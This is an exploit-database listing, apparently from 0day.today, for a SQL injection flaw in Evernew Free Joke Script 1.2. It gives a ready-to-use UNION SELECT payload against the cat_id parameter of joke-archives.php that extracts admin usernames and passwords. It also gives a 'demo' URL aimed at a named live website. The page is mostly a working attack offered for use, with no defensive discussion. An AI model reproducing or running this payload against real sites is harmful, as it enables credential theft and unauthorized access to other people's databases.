[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

Evernew Free Joke Script 1.2 (cat_id) Remote SQL Injection Vulnerability

Author
taRentReXx
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-5266
Category
web applications
Date add
26-05-2009
Platform
unsorted
========================================================================
Evernew Free Joke Script 1.2 (cat_id) Remote SQL Injection Vulnerability
========================================================================


@~~=======================================~~@
@~~=Script   : Evernewjoke Script

@~~=S.Site   : http://www.evernewscripts.com/2009/02/free-joke-script/

@~~=Demo     : http://www.evernewjokes.com/
@~~=======================================~~@



@~~=Vul file :joke-archives.php

@~~=Exploit :-

		joke-archives.php?start=0&cat_id=-1 union all select 1,2,concat(user,0x3a,password),4,5,0x625920746152656e7452655878,7,8,9,10,11,12,13 from admin--


		!! DEMO !!:-

		http://www.evernewjokes.com/joke-archives.php?start=0&cat_id=-1 union all select 1,2,concat(user,0x3a,password),4,5,0x625920746152656e7452655878,7,8,9,10,11,12,13 from admin--






#  0day.today [2024-11-15]  #